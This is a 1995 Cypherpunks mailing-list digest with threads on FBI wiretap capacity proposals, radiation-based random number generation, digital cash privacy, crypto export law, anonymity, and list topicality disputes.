bryce at colorado.edu From llurch at networking.stanford.edu Thu Nov 2 22:38:20 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 3 Nov 1995 14:38:20 +0800 Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 3 Nov 1995 clarkm at cnct.kom wrote: > Thanks for this item! Two little excerpts jump out at me. Gee, I hope they didn't spook you too badly when they jumped out at you like that. I can tell you're a little jumpy. > > Last year, federal and state courts authorized 1,154 wiretaps, of which > > 48 percent > > [snip] > > > "People are starting to say that seems awfully high," Dempsey said, noting > > that > > the overall level of such surveillance activity is now a total of 20,000 > > to 25,000 > > intercepts nationwide over an entire year. > > So what is it? 1,154 wiretaps? Or 20,000? Easy: both. 1,154 wiretaps, and 20K to 25K intercepts, which includes both wiretaps and other interceptions, i.e., recording which phone numbers you call but not actually listening to the conversations. Get out of Dodge. > FBI Director Louis Freeh testified under oath to 1,157. The FBI was asked > for the data to support those numbers. The FBI refused to release them > until the year 2002. > > The FBI is being sued under FOIA to support Freeh's sworn testimony. (Of > course, he used different numbers at different times....) By whom is the FBI being sued? What is the case number? Who are the lawyers? What are their Bar numbers? How many times have they been disciplined for bringing frivolous suits?
> One last thing. > > What's so special about the year 2002? Obviously, it is two elections from now, when the UN will invade the US to impose the rule of the Anti-Christ. Oops, I wasn't supposed to say that. - -rich From sharborth at hai-net.com Thu Nov 2 22:41:31 1995 From: sharborth at hai-net.com (sharborth at hai-net.com) Date: Fri, 3 Nov 1995 14:41:31 +0800 Subject: Radiation Detectors from Aware Electronics Message-ID: <9510038153.AA815390510@houston_cc_smtp.hai-net.com> So what does this have to do with this mailing list?? Skip ______________________________ Reply Separator _________________________________ Subject: Radiation Detectors from Aware Electronics Author: perry at piermont.com at internet Date: 02-11-95 23:45 There have been several requests for information on the company that makes the radiation detectors with RS232 interfaces that I mentioned. Here is how to reach them: Aware Electronics P.O. Box 4299 Wilmington, DE 19807 Phone (800) 729-5397 (302) 655-3800 Perry From tcmay at got.net Thu Nov 2 22:55:37 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 3 Nov 1995 14:55:37 +0800 Subject: What!!! Message-ID: At 11:25 PM 11/2/95, tony266 at vabeach.email.net wrote: >Can someone tell me this cypherpunks is all about??? Grammar not best subject his. List sense make after read for time. --Klaus! More seriously, when you subscribed you undoubtedly got a "Welcome" message. I suggest you read it. Reading topics that interest you on the list is the best way to learn what it "is all about." The Cypherpunks list archives and Cyphernomicon are also useful.
They are in various places, including these Web sites: http://www.hks.net/cpunks/index.html http://www.oberlin.edu/~brchkind/cyphernomicon/ --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From clarkm at cnct.com Thu Nov 2 23:37:43 1995 From: clarkm at cnct.com (clarkm at cnct.com) Date: Fri, 3 Nov 1995 15:37:43 +0800 Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas Message-ID: <9511031007.AA0024@localhost> > On Fri, 3 Nov 1995 clarkm at cnct.kom wrote: > > > Thanks for this item! Two little excerpts jump out at me. > > Gee, I hope they didn't spook you too badly when they jumped out at you > like that. I can tell you're a little jumpy. Hi Rich! Thx for changing my domain, I'm sure it fooled SAIC. > > So what is it? 1,154 wiretaps? Or 20,000? > > Easy: both. 1,154 wiretaps, and 20K to 25K intercepts, which includes both > wiretaps and other interceptions, i.e., recording which phone numbers you > call but not actually listening to the conversations. > > Get out of Dodge. You get out of Dodge. 1,154 electronic surveillance orders, about 7,000 pen registers & trap/trace plus 500 FISA warrants, all 1993 if memory serves. Figures as supplied to EPIC, and from memory. > By whom is the FBI being sued? What is the case number? Who are the > lawyers? What are their Bar numbers? How many times have they been > disciplined for bringing frivolous suits? EPIC. Quick!! Fire up your index! > > What's so special about the year 2002? 
> > Obviously, it is two elections from now, when the UN will invade the US > to impose the rule of the Anti-Christ. > > Oops, I wasn't supposed to say that. But now that you have... Check out the wiretap stats and FOIA responses at http://www.epic.org and come back & quibble some more. clark.matthews at paranet.org * PERMISSION TO COPY / REPOST * NEMO ME IMPUNE LACESSIT From llurch at networking.stanford.edu Thu Nov 2 23:50:12 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 3 Nov 1995 15:50:12 +0800 Subject: [NOISY] Re: Clinton Administration Plans 1.5 MILLION WIRETAPS In-Reply-To: <9511030814.AA0039@cnct-gw.new-york.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 3 Nov 1995 clarkm at cnct.com wrote: Ah, Clark graces us with his presence. See articles <46kf2u$4ck at mars.cnct.com> and <45ch8o$915 at mars.cnct.com>. I especially enjoyed <44l7r9$dsv at mars.cnct.com>. > From THE SPOTLIGHT > 300 Independence Avenue, S.E. > Washington, DC 20003 Here's a little more information on this fine publication, which is in the forefront of the struggle to expose the truth about the United Nations' responsibility for the bombing of the Oklahoma Federal Building. Note the second Library of Congress topic classification. The Spotlight is often cited in alt.revisionism. Larger University libraries usually carry it; I know Stanford and Berkeley do. TITLE: Spotlight (Washington, D.C.) The Spotlight. The Spotlight (Washington) IMPRINT: Washington, Liberty Lobby. v. ill. 39 cm. TOPICS: United States--Politics and government--1969---Periodicals. Antisemitism--Periodicals. Conservatism--United States--Periodicals.
NOTES: Weekly (except two issues combined into one at beginning of year) v. 2, no. 16- Apr. 19, 1976- Continues: National spotlight Language: English Year: 1976- ISSN 0191-6270 > Technology & Liberty > November 13, 1995 > > > ADMINISTRATION PLANS 1.5 MILLION TELEPHONE INTERCEPTS > > By Clark Matthews > clark.matthews at paranet.org > > Janet Reno's Justice Department and the FBI have directed U.S. > telephone companies to prepare for up to 1.5 million > simultaneous, electronic intercepts on Americans' telephones. This is not true. This is a trial balloon, not a directive; it's a first, wet dream draft at the beginning of a public comment period. It is dead on arrival. It will not be implemented, not if we have any say in the matter, and we do. Please do chime in, though, based on EPIC's responsible analysis and recommendations. > The same directive requires the nation's phone companies to > complete the necessary modifications to their equipment to create > this massive surveillance apparatus from America's public > telephone networks. Telephone companies are directed to have > these capabilities in place by October 28, 1998, one week before > the 1998 elections. This is not true. [Tin-foil-hat-tinged plagiarism of EPIC's alert deleted] > The administration's eavesdropping diktats are buried in a set of > technical "capacity requirements" that telephone companies are > expected to meet in order to comply with the CALEA law. The > capacity requirements appear on pages 53643-53646 of the Federal > Register for October 16, 1995. Computer users can access this > document electronically on the internet from the Electronic > Privacy Information Center (http://www.epic.org) or by using wais > (wais.access.gpo.gov). The second and third sentences are true. If you are a US citizen (natural born White Sovereign State Citizen or otherwise), please follow up on them. Let your voice be heard. The first sentence has at least four readily apparent logical and factual flaws. 
> or businesses. They can also be programmed to monitor telephone > conversations, intercept faxes, and record communications > sessions between computer modems, including computer passwords > and digital transactions. Not if they're encrypted, they can't :-) > Here is a breakdown of the scope of the federal surveillance > described by the capacity requirements: [All plagiarized from the EPIC alert; a few errors, but nothing major] > And since "major cities" are "high interest" areas, the actual > number is more likely to approach one million or more. Even > these figures don't tell the whole story. The Justice Department > directives have a built-in vagueness that allows areas to be re- > defined. They can become "high-interest" hotspots at any time, > under any circumstances. A currency crisis, for instance. Or a > hotly contested election. Or perhaps a mysterious bombing > provocation in the midwest. This is completely untrue. Cite please? > Furthermore, telephone companies do not have the luxury of > meeting the minimum surveillance requirements. It's a > technological reality that they must modify their equipment to > meet the maximum requirements. That's because the FBI can re- > define their surveillance responsibilities at any time, by > branding their customers as "interesting". Cite? > WRITE YOUR REPRESENTATIVES Yes, please do. The facts are rather disturbing. Clark's transcription leaves a little to be desired, so I quote EPIC: WHAT YOU CAN DO: (a) Express support for Rep. Bob Barr (R-GA), a former federal prosecutor and leading Congressional opponent of the FBI's request for wiretap funding: Rep. Bob Barr U.S. House of Representatives 1607 Longworth Building Washington, DC 20515 (202) 225-2931 (b) Submit comments to the FBI. Object to the "percentage approach" to wiretap capacity. Urge the FBI to follow the current measurement of wiretapping, as reported annually by the Administrative Office of the U.S. 
Courts, which considers the actual number of wiretaps authorized. If you are a telephone customer, ask the FBI to address the privacy risks of unauthorized, illegal, or excessive wire surveillance. Comments should be submitted in triplicate to the Telecommunications Industry Liaison Unit (TILU), Federal Bureau of Investigation, P.O. Box 220450, Chantilly, VA 22022-0450. Send copies of your comments to EPIC (alert at epic.org) and Congressman Barr. ** Comments must be received by November 15, 1995. ** (c) If you represent or work for a telecommunications company, equipment manufacturer, or service provider, assess carefully the cost and liability that this proposed federal regulation may impose on your company and the risk that it may expose your customers to illegal wiretapping. If you are interested in challenging the final FBI rule, contact EPIC. [BUAF of a birdie deleted] - -rich From jirib at cs.monash.edu.au Thu Nov 2 23:55:51 1995 From: jirib at cs.monash.edu.au (Jiri Baum) Date: Fri, 3 Nov 1995 15:55:51 +0800 Subject: Chaum's cash: backup? In-Reply-To: <199510241312.OAA00644@digicash.com> Message-ID: <199511030729.SAA03867@molly.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello Marcel van der Peijl, > From: "Marcel van der Peijl" > Date: Tue, 24 Oct 1995 14:10:58 +0100 Sorry about taking so long to reply... I'll quote more than usual to make up for it. > > > I could give a hint: your random state initializer is not the too-often > > > used srand( time( NULL ) ) but user-chosen during installation. > > This sounds great... Will the bank be running crack against the proto-coins > > it gets? (Say, at the behest of a LEA?)
> It is not the bank's intention to screw the clients, but mostly the > other way around. I was referring to the claim that the system is payer-anonymous. Thinking of it again now, what's to stop Eve the eavesdropper from spying on the proto-coins, running crack against it, and then (later) eavesdropping on the bank-signed coins and unblinding/depositing them before Alice/Bob does? (No, being encrypted by the bank's public key is not enough.) > If the bank wants to screw the clients the easiest > way is to change their account balance. Remember, you trust them with > your money. That's why they're a bank. Yes, but is the bank really interested in protecting privacy? > > Is there any way for the user to re-initialize the random state? > > > Write that initializer down and you can re-generate all coins. > > ... > > That's going to be one hell of a valuable piece of paper. > > (Certainly to your enemies/prosecutors - it reveals the blinding factors > > for every coin you ever spent.) > You may choose to burn it or change random state and have no > recoverability. What do you value more? Your privacy or your money? > Each user will have too choose. a) It would be nice if the protocol didn't require this choice. b) This choice should be made explicit to the user. c) As I noted above, wouldn't it also strongly reduce security? See you! Jiri - -- PGP 463A14D5 From enzo at ima.com Fri Nov 3 00:34:17 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Fri, 3 Nov 1995 16:34:17 +0800 Subject: [NOISE] Re: censored?
corrected [Steve Pizzo cited in The Spotlight] In-Reply-To: <199511030614.XAA02702@nagina.cs.colorado.edu> Message-ID: On Thu, 2 Nov 1995, Bryce wrote: > That's one way to look at it. Of course since the "license > requirements" had to do with some obscure administrivia that nobody > thought would apply to ISP's, none of the 6 or so ISP's in Hong Kong > had thought to apply for it. One has to wonder why the gov't pulled > the plug on 5 of them without so much as a warning, much less a > chance to comply. > > > Did I say 5? Oh yes. The largest HK ISP-- and the one with closest > ties to the government-- had gone ahead and applied for the license > just a couple of weeks before the blackout. Corruption is the modus > operandi in HK, so I wouldn't be at all surprised if that one ISP > got a special favor by being warned of the impending black-out, or > even if it had a hand in instigating it. Look: I've followed very closely all that sad story, as I routinely participate in the meetings between the Government's Telecom regulator (OFTA) and the representatives of the IT industry regarding ISP regulations and the difficult relationships with the telephone carrier (in the role, incidentally, of a strong advocate of de-regulation). The cutoff was determined by an initiative of the Police's Commercial Crime Bureau, tipped by complaints from that provider you're mentioning (HK Supernet). The initiative was taken without any pressure from above, and actually the CCB had to backpedal very hurriedly after the intervention of several legislators (I assisted to an embarrassing panel meeting where one of them scolded the chief of the CCB and advanced the hypothesis of a possible lawsuit by the providers against the Government for unlawful action, due to a few clumsy procedural "faux pas" by the police). In other words, the whole matter looked more like "Inspector Clouseau vs the ISP's" than a perfidious conspiracy to suppress the freedom of speech.
In any case, before Perry (rightly) send us stern reminders of the scarce crypto relevance of this thread, let's take it out of Cypherpunks and, if someone is interested, let's continue by e-mail. Cheers -- Enzo From carolann at censored.org Fri Nov 3 01:04:59 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Fri, 3 Nov 1995 17:04:59 +0800 Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas Message-ID: <199511030134.BAA04330@mailhost1.primenet.com> This story broke on ABC radio news 26 hours ago. It is still running as lead story. Love Always, Carol Anne...still amazed it's lead story -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From llurch at networking.stanford.edu Fri Nov 3 01:32:54 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 3 Nov 1995 17:32:54 +0800 Subject: [NOISE, NOTE HEADERS] Re: FBI Wants to Wiretap One of Every 100 , Phones in Urban Areas In-Reply-To: <9511031007.AA0024@localhost> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 3 Nov 1995 clarkm at cnct.com wrote: > > On Fri, 3 Nov 1995 clarkm at cnct.kom wrote: > > > > > Thanks for this item! Two little excerpts jump out at me. > > > > Gee, I hope they didn't spook you too badly when they jumped out at you > > like that. I can tell you're a little jumpy. > > Hi Rich! Thx for changing my domain, I'm sure it fooled SAIC. I can only hope you're joking, but based on your last article, I'm not so sure. That was intended as a small joke for anyone using PGP; see the X-PGP-Key header in the original message. 
You really should have talked to Steve Pizzo before bastardizing his article. Now you might get written up again as an example of the conspiracy wackos on the net. I suppose you view any publicity as a positive. I wholly support that goal. > > By whom is the FBI being sued? What is the case number? Who are the > > lawyers? What are their Bar numbers? How many times have they been > > disciplined for bringing frivolous suits? > > EPIC. EPIC has indeed made an FOIA claim and sued the FBI, but not for the reasons stated, which is why I assumed you were talking about something else. Again, Spotlight being vague about evidence that doesn't really support their points. The case is C.A. No. 94-1720 (CRR) in D.C. You can write to the court for the full record, at duplication cost. I fully support EPIC's position. My apologies for confusing the message with the second-hand, third-rate messenger. I notice you added Arnie Lerma to the recipient list. Didn't he publicly dissociate himself from you guys? Doesn't he have other things on his mind? I have another little joke just for him on my machine at gopher://dorms.stanford.edu:70/0R478556-480696-/win95netbugs et seq (the file actually goes all the way to byte 1149418). [Big Bird deleted] - -rich [Followups out of cpunks, please] From gnu at toad.com Fri Nov 3 01:51:00 1995 From: gnu at toad.com (John Gilmore) Date: Fri, 3 Nov 1995 17:51:00 +0800 Subject: Transcript of Bernstein hearing is now available Message-ID: <9511020308.AA25206@toad.com> We received the transcript of October 20's oral hearing from the court stenographer.
It's up on the EFF Web site at: http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/951020_hearing.transcript This is from Dan Bernstein's case, which is trying to get the crypto export laws invalidated as unconstitutional. This particular hearing is about the government's motion to throw the case out of court because the courts don't have jurisdiction to decide the issue. Some of it is deep legalese, and some of it is quite readable. There's still no news from the judge on what her decision is, or when she will decide. John Gilmore From tcmay at got.net Fri Nov 3 01:52:17 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 3 Nov 1995 17:52:17 +0800 Subject: Hit-and-Run Anonymous Posts (Re: "Dr." Fred) Message-ID: At 10:22 AM 11/1/95, Dr. Frederick B. Cohen wrote: (quoting an anonymous poster) >> The difference, of course, is that its almost impossible >> to have sympathy for Dr. Fred. His hustle is for a hell >> of a lot more than subsistence. He was also never actually >> a master of his field, a fact that becomes increasingly >> obvious as our exposure to him goes on. Now he's reduced >> himself to trying to collect someone else's winnings. > >Sour grapes, and from an anonymous poster too. Oooo - I'm insulted. > >I have been thinking about the issues of anonymity for some time, and I >have been convinced for some time that you can't have both integrity and >anonymity. I thought there might be ways to accomplish this, but the >cypherpunks have convinced me it isn't true. Show some integrity and >tell us who you are. I've also found that anonymous persons are usually the most prone to hit-and-run attacks and flames. I usually only briefly scan anonymous posts and then delete them. Some people hide behind anonymity to launch scurrilous attacks. Best to just ignore them, in my opinion. Exceptions are the cases when an anonymous source has something "sensitive" to contribute, such as the release of the putative MD4 code, and the like. 
And there have of course been thoughtful anonymous essays. Anonymity is under some assault today. I think it important not to throw out the very basic advantages of allowing anonymity just because some abuse occurs. (The issue is not that "allowing" it is good, but that "banning" it would require drastic and draconian enforcement measures.) Pseudonyms are another matter entirely. Some are classy (Pr0duct Cypher, Black Unicorn, Lucky Green), some are oafish (S Boxx), some are ephemeral. Persistence of the identity, as when backed by digital signatures, is important. (Though not essential, yet.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From perry at piermont.com Fri Nov 3 01:54:46 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 3 Nov 1995 17:54:46 +0800 Subject: IBM's Microkernal In-Reply-To: <199511011817.TAA17785@utopia.hacktic.nl> Message-ID: <199511011832.NAA02128@jekyll.piermont.com> Anonymous writes: > > Responding to msg by perry at piermont.com ("Perry E. Metzger") on > Wed, 01 Nov 11:51 AM > > >Why is this being sent to cypherpunks? Its totally > >irrelevant. > > > It's related to IBM's work on machine/code interface security, > encryption and authentication capabilities. No it isn't. Its just an operating system microkernel. These typically just provide very low level process abstractions to allow device drivers and operating system interfaces to be built as processes. It has nothing WHATSOEVER to do with cryptography. 
I realize that the word "code" appeared in the article, but just because the word "code" gets used doesn't mean we are talking about cryptography. By the way, learn how to spell "kernel". Perry From gjeffers at socketis.net Fri Nov 3 02:06:04 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Fri, 3 Nov 1995 18:06:04 +0800 Subject: censored with Perry Message-ID: <199511031355.HAA16831@mail.socketis.net> Enzo Michelangeli writes: >In any case, before Perry (rightly) send us stern reminders of the scarce >crypto relevance of this thread, let's take it out of Cypherpunks and, >if someone is interested, let's continue by e-mail. Perry is again narrowly defining allowable speech on Cypherpunks. Encryption becomes a trivial topic if its best medium is taken by the States. Perry is still in his "only encryption algorithms in C is a proper topic for Cypherpunks" mode. This is a direction that if followed would take the vitality and relevance out of the Cypherpunks list. Perry does a disservice for Cypherpunks. Since when did Cypherpunks become the mailing list fit for Perry? Perry makes a big deal out of "nobody speaks for Perry" yet on Cypherpunks he has decided that he sets the parameters for allowed speech. When did Perry come to own the list? Where did he get this "authority" to tell other Cypherpunks to shut up? As Perry often presumptuously and rudely reminds C'punks that their speech is not tolerable, we must also take the time and trouble to occasionally tell Perry to shove his opinions up his ass.
Gary Jeffers From futplex at pseudonym.com Fri Nov 3 02:34:38 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 3 Nov 1995 18:34:38 +0800 Subject: Radiation Detectors from Aware Electronics In-Reply-To: <9510038153.AA815390510@houston_cc_smtp.hai-net.com> Message-ID: <199511031009.FAA11845@opine.cs.umass.edu> Perry writes: > There have been several requests for information on the company that > makes the radiation detectors with RS232 interfaces that I mentioned. > > Here is how to reach them: Skip writes: > So what does this have to do with this mailing list?? Perry recently recommended the use of background-radiation detectors as good cheap true RNGs. Properly deployed cryptography generally depends upon excellent PRNGs, or preferably hardware RNGs. Perhaps you overlooked that rather lengthy thread, Skip ? -Futplex From edge at got.net Fri Nov 3 02:48:43 1995 From: edge at got.net (Jay Campbell) Date: Fri, 3 Nov 1995 18:48:43 +0800 Subject: censored? corrected [Steve Pizzo cited in The Spotlight] Message-ID: <199511031144.DAA08978@you.got.net> > Is it? This is the _one_ thing in the article (is that term >giving it too much legitimacy?) that I thought was barely true. Whoever >controls the root level DNS servers effectively controls the Internet. >I postulated a couple of months ago about how the US Govt might attempt >to censor the rest of the world: "Remove lurid.porno.site.other-country >from your DNS system within 72 hours or we will remove references to >your DNS servers from the root level servers.". (I also speculated that >if the US Govt tried doing this, that an 'underground' DNS system would >form almost immediately.) [off topic] It almost did when InterNIC announced its recent (and abrupt) new pricing structure for domain names.
All it would take is an additional entry in {dns}/root.cache - even a small company with decent VC (and multiple geographic locations, preferably) could have pulled this off and made a decent chunk of change underselling InterNIC; with a slight shift in the way things are done, the model could have been opened up into a competitive market with price and (GASP!) customer service/response time wars. [FADE IN: Look, Jim! I submitted my domain through Campbell.NET 30 seconds ago and it's already live .. That's nothing, Terry, ...] Yet another 'axiom' that turns out to be nothing more than convention. -- Jay Campbell edge at got.net - Operations Manager -=-=-=-=-=-=- Sense Networking, Santa Cruz Node Jay at Campbell.net got.net? PGP MIT KeyID 0xACAE1A89 "On the Information Superhighway, I'm the guy behind you in this morning's traffic jam leaning on his horn." From edge at got.net Fri Nov 3 02:53:21 1995 From: edge at got.net (Jay Campbell) Date: Fri, 3 Nov 1995 18:53:21 +0800 Subject: alt.anonymous.messages considered harmful Message-ID: <199511031132.DAA08776@you.got.net> >Those who do get the message, can not notice a cancel attack; those >who don't, would have to carefully search for suspicious Supersedes: >lines and monitor the control newsgroup. A denial of service attack by >manipulated Path: header cannot be detected by the victim. cancels aren't the only monster .. we have a vigilante up the pipe somewhere deleting a chunk of every post set in certain alt.binaries.* groups without a cancel - they're simply not passing along a piece of every set. this is irritating (as an ISP) since it should be an individual site's responsibility (if not the user emselve's), hence the term 'vigilante' as opposed to 'concerned administrator'. the fix is to get multiple feeds, of course, but everyone in the area happens to be fed through this branch .. but i digress. 
--
Jay Campbell         edge at got.net - Operations Manager
-=-=-=-=-=-=-        Sense Networking, Santa Cruz Node
Jay at Campbell.net   got.net?   PGP MIT KeyID 0xACAE1A89

"On the Information Superhighway, I'm the guy behind you in this morning's
traffic jam leaning on his horn."

From futplex at pseudonym.com Fri Nov 3 02:58:16 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 18:58:16 +0800
Subject: censored with Perry
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <199511031020.FAA24928@opine.cs.umass.edu>

Enzo Michelangeli writes:
> In any case, before Perry (rightly) send us stern reminders of the scarce
> crypto relevance of this thread, let's take it out of Cypherpunks

Gary Jeffers writes:
> Perry is again narrowly defining allowable speech on Cypherpunks.

Since Perry hasn't said a damn thing about this Hong Kong ISP thread on the
list, I suggest that you're wasting your time chasing around a hypothetical
situation.

-Futplex
Me speak for Perry ? "It just couldn't be, and only a fool would say that"
-Steely Dan, 1972

From edge at got.net Fri Nov 3 03:09:06 1995
From: edge at got.net (Jay Campbell)
Date: Fri, 3 Nov 1995 19:09:06 +0800
Subject: FBI seeks huge wiretapping system
Message-ID: <199511031202.EAA09281@you.got.net>

>I was being facetious. The point is that the government has no
>inherent right to tap our phones -- indeed, it didn't do so for nearly
>the first 200 years of our existance, and we did just fine -- better,
>in fact.

It is a well-known fact that it was common practice for NSA operatives to
masquerade as Injuns in the 1800's and waylay Pony Express riders in order
to intercept communications between targeted parties. This practice lost
popularity towards the end of the century with the advent of boxed cereal,
and with it the Lone Ranger Decoder Ring, since the operatives were too
underfunded to afford anything more than oatmeal.
[ducks]

--
Jay Campbell         edge at got.net - Operations Manager
-=-=-=-=-=-=-        Sense Networking, Santa Cruz Node
Jay at Campbell.net   got.net?   PGP MIT KeyID 0xACAE1A89

"On the Information Superhighway, I'm the guy behind you in this morning's
traffic jam leaning on his horn."

From usura at berserk.com Fri Nov 3 03:32:08 1995
From: usura at berserk.com (Alex de Joode)
Date: Fri, 3 Nov 1995 19:32:08 +0800
Subject: Radiation Detectors from Aware Electronics
Message-ID:

sharborth at hai-net.com writes in a followup to perry at piermont.com:
....
:: There have been several requests for information on the company that
:: makes the radiation detectors with RS232 interfaces that I mentioned.
[..]
:: Perry
:
: So what does this have to do with this mailing list??
: Skip

The cypherpunks mailing list has a lot to do with cryptography, an
important element of cryptography is randomness one way that seems to be a
superior source for obtaining random data is radioactive decay, radiation
detectors which have an RS232 interface can be hooked up to a computer and
thus act as a source of randomness.

-AJ-
--
kill -9 hkk at netcom.com .. process killed .. lawyer terminated successfully

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Fri Nov 3 05:58:50 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Fri, 3 Nov 1995 21:58:50 +0800
Subject: Risks of ``foreign persons'' under the ITAR
Message-ID:

It is usually assumed that a foreign person outside the United States runs
no risks if he posts cryptographic software to the net or otherwise
discloses it to other foreign persons, although technically that is a
violation of the United States International Traffic in Arms Regulations.

I note, however, that in an article entitled ``Export Controls on
Encryption Software'' by Ira S.
Rubinstein, dated October 17, 1994 (which apparently was distributed at
some legal conference) the following passage appears in Section 4(3):

----------------

Finally, foreign employees of those companies or any foreign person who
runs afoul of export controls on technology transfers may face severe
immigration consequences.[83] Under the Immigration and Nationality
Act,[84] as revised by the immigration act of 1990,[85] an alien who seeks
entry to the U.S. to engage in activities that violate or evade export
control laws is excludable.[86] Similarly, an alien who has engaged, is
engaged, or at any time after entry engages in such activities is
deportable.[87]

[Notes]

[83] For a detailed discussion see generally Rubinstein, ``Export Controls
and Immigration Law,'' 93-3 Immigration Briefings (Mar. 1993).

[84] Immigration and Nationality Act of 1952, Pub. L. No. 82-414, 66 Stat.
163 (codified as amended at 8 USC \S\S 1101-1524) (hereinafter INA).

[85] Immigration Act of 1990, Pub. L. No. 101-649, 104 Stat. 4978
(hereinafter IMMACT 90).

[86] INA \S 212(a)(3)(A)(i)(II), 8 USC \S 1182(a)(3)(A)(i)(II).

[87] OMA \S 21(a)(4)(A)(i), \S 1251(a)(4)(A)(i).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From bplib at wat.hookup.net Fri Nov 3 06:36:37 1995
From: bplib at wat.hookup.net (Tim Philp)
Date: Fri, 3 Nov 1995 22:36:37 +0800
Subject: video as a source of public randomness
In-Reply-To:
Message-ID:

Would not generating random numbers using video sources be susceptible to
the same 'external' influences as generating random numbers from radio
static? External RF fields could skew the 'randomness' of the data.

As another thought, has anyone done any work on RNGs involving chaotic
processes such as fluid dynamics and turbulent flow? I suspect that
pressure, or other parameter variances, in turbulent flow could yield good
random numbers.
As a bonus, these parameters are easily measurable without special,
exotic, equipment and should be inexpensive

Regards,

Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys at swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================

From perry at piermont.com Fri Nov 3 06:36:37 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 22:36:37 +0800
Subject: Radiation Detectors from Aware Electronics
In-Reply-To: <9510038153.AA815390510@houston_cc_smtp.hai-net.com>
Message-ID: <199511031419.JAA08735@jekyll.piermont.com>

sharborth at hai-net.com writes:
> So what does this have to do with this mailing list??

Generating good random numbers is key to operating a solid
cryptographic system. I've argued that computer interfaced radiation
detectors are the optimal way of generating such numbers because they
are hard to screw up -- biased diode noise and other sources are too
easy to misdesign or misuse. Aware is a source of such detectors.

Perry

> There have been several requests for information on the company that
> makes the radiation detectors with RS232 interfaces that I mentioned.
>
> Here is how to reach them:
>
> Aware Electronics
> P.O. Box 4299
> Wilmington, DE 19807
> Phone (800) 729-5397
>       (302) 655-3800
>
>
> Perry
>
>

From perry at piermont.com Fri Nov 3 06:50:05 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 22:50:05 +0800
Subject: Sources of randomness
In-Reply-To:
Message-ID: <199511031427.JAA08758@jekyll.piermont.com>

Timothy C. May writes:
> I meant a t.v. channel, as in broadcast t.v., such as is easily gotten with
> rabbit ears, or nothing (since the idea is to get noise, from the ether, or
> from the tuner itself).
> A snow-filled picture has pixels which are unlikely
> in the extreme to be predicted/deduced by outside attackers, who cannot
> know the details of antenna orientation, microscopic variations in
> geometry, LRC, tuner sensitivity, etc. That is, snowy pictures are not
> guessable.

I'm not so sure. There may be hidden patterns we don't notice. It's on
little things like this that a cryptanalyst would try to pry open a
hole in a system. I'm unwilling to predict that the patterns are
unguessable based purely on gut instinct. As Bob Morris of the NSA has
said, never underestimate the effort your adversary will go to in order
to read your traffic.

I'll stick to recommending radioactive sources for now. Quantum
mechanics is your friend, and detectors from places like Aware are
cheap.

Perry

From s1113645 at tesla.cc.uottawa.ca Fri Nov 3 07:13:37 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Fri, 3 Nov 1995 23:13:37 +0800
Subject: What!!!
In-Reply-To:
Message-ID:

On Thu, 2 Nov 1995, Timothy C. May wrote:

> At 11:25 PM 11/2/95, tony266 at vabeach.email.net wrote:
>
> >Can someone tell me this cypherpunks is all about???
>
> Grammar not best subject his. List sense make after read for time.

Quibble quibble. He's referring to cypherpunks the list in the singular,
not us the masses in the plural.

>
> --Klaus!
>
> More seriously, when you subscribed you undoubtedly got a "Welcome"
> message. I suggest you read it.
>

Mayhap he's another person whose lists are gradually being fused into
cpunks due to mass forwarding :-)

From ljo at ausys.se Fri Nov 3 07:19:58 1995
From: ljo at ausys.se (Johansson Lars)
Date: Fri, 3 Nov 1995 23:19:58 +0800
Subject: Info needed on observers
Message-ID: <95Nov3.093928gmt+0100.53773@void.ausys.se>

>I am currently preparing a paper on payment systems for the Internet
>and related issues.
